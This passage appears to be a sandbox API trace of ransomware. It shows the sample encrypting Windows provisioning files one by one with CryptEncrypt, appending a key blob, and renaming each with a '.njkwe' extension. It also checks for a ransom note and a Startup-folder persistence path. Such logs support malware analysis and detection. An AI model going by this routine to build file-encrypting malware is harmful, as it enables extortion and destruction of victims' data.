pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 223 [0078.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\358_connections_cellular_chelyabinsk cellular communications llc (russian federation)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\358_connections_cellular_chelyabinsk cellular communications llc (russian federation)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.571] GetProcessHeap () returned 0xbe0000 [0078.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.571] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d28fbc, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d28fbc, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d28fbc, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1f1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="359__C~1.PRO")) returned 1 [0078.572] lstrcmpiW (lpString1="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.572] lstrcmpiW (lpString1="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.572] lstrcmpiW (lpString1="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.572] lstrcmpiW (lpString1="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.572] lstrcmpiW (lpString1="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.572] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 175 [0078.572] StrStrIW (lpFirst="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.572] lstrcmpW (lpString1="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.572] lstrcmpW (lpString1="359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.572] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\359__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\359__connections_cellular_dontelecom (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.572] GetTickCount () returned 0x1153f86 [0078.572] GetTickCount () returned 0x1153f86 [0078.572] GetTickCount () returned 0x1153f86 [0078.572] GetTickCount () returned 0x1153f86 [0078.572] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.572] GetProcessHeap () returned 0xbe0000 [0078.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.572] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1f1, lpOverlapped=0x0) returned 1 [0078.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.574] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1f1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1f1, lpOverlapped=0x0) returned 1 [0078.574] GetProcessHeap () returned 0xbe0000 [0078.574] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.574] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.574] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.574] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.575] CloseHandle (hObject=0x43c) returned 1 [0078.575] GetProcessHeap () returned 0xbe0000 [0078.575] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.575] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 195 [0078.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\359__connections_cellular_dontelecom (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\359__Connections_Cellular_DonTeleCom (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\359__connections_cellular_dontelecom (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.576] GetProcessHeap () returned 0xbe0000 [0078.576] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.576] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901fba3a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901fba3a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901fba3a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x347, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", cAlternateFileName="35__CO~1.PRO")) returned 1 [0078.576] lstrcmpiW (lpString1="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.576] lstrcmpiW (lpString1="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.576] lstrcmpiW (lpString1="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.576] lstrcmpiW (lpString1="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.576] lstrcmpiW (lpString1="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.576] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml") returned 160 [0078.576] StrStrIW (lpFirst="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.576] lstrcmpW (lpString1="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.576] lstrcmpW (lpString1="35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.576] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\35__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.576] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\35__connections_cellular_zain bh (bahrain)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.576] GetTickCount () returned 0x1153f96 [0078.576] GetTickCount () returned 0x1153f96 [0078.576] GetTickCount () returned 0x1153f96 [0078.576] GetTickCount () returned 0x1153f96 [0078.576] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.577] GetProcessHeap () returned 0xbe0000 [0078.577] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.577] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x347, lpOverlapped=0x0) returned 1 [0078.579] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.579] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x347, lpOverlapped=0x0) returned 1 [0078.579] GetProcessHeap () returned 0xbe0000 [0078.579] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.579] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.579] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.579] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.579] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.579] CloseHandle (hObject=0x43c) returned 1 [0078.579] GetProcessHeap () returned 0xbe0000 [0078.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.580] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\35__connections_cellular_zain bh (bahrain)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\35__Connections_Cellular_Zain BH (Bahrain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\35__connections_cellular_zain bh (bahrain)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.580] GetProcessHeap () returned 0xbe0000 [0078.580] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.580] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d28fbc, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d28fbc, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d28fbc, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x297, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="360__C~1.PRO")) returned 1 [0078.580] lstrcmpiW (lpString1="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.580] lstrcmpiW (lpString1="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.580] lstrcmpiW (lpString1="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.580] lstrcmpiW (lpString1="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.580] lstrcmpiW (lpString1="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.580] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 174 [0078.580] StrStrIW (lpFirst="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.581] lstrcmpW (lpString1="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.581] lstrcmpW (lpString1="360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.581] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\360__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\360__connections_cellular_ermak rms (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.581] GetTickCount () returned 0x1153f96 [0078.581] GetTickCount () returned 0x1153f96 [0078.581] GetTickCount () returned 0x1153f96 [0078.581] GetTickCount () returned 0x1153f96 [0078.581] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.581] GetProcessHeap () returned 0xbe0000 [0078.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.581] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x297, lpOverlapped=0x0) returned 1 [0078.591] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd69, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.591] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x297, lpOverlapped=0x0) returned 1 [0078.591] GetProcessHeap () returned 0xbe0000 [0078.591] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.591] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.591] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.591] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.591] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.591] CloseHandle (hObject=0x43c) returned 1 [0078.592] GetProcessHeap () returned 0xbe0000 [0078.592] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.592] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 194 [0078.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\360__connections_cellular_ermak rms (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\360__Connections_Cellular_Ermak RMS (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\360__connections_cellular_ermak rms (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.592] GetProcessHeap () returned 0xbe0000 [0078.592] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.592] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d4f224, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d4f224, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d4f224, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ce, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="361__C~1.PRO")) returned 1 [0078.592] lstrcmpiW (lpString1="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.592] lstrcmpiW (lpString1="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.593] lstrcmpiW (lpString1="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.593] lstrcmpiW (lpString1="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.593] lstrcmpiW (lpString1="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.593] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 172 [0078.593] StrStrIW (lpFirst="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.593] lstrcmpW (lpString1="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.593] lstrcmpW (lpString1="361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.593] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\361__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.593] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\361__connections_cellular_megafon (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.594] GetTickCount () returned 0x1153fa5 [0078.594] GetTickCount () returned 0x1153fa5 [0078.594] GetTickCount () returned 0x1153fa5 [0078.594] GetTickCount () returned 0x1153fa5 [0078.594] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.594] GetProcessHeap () returned 0xbe0000 [0078.594] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.594] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0078.597] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 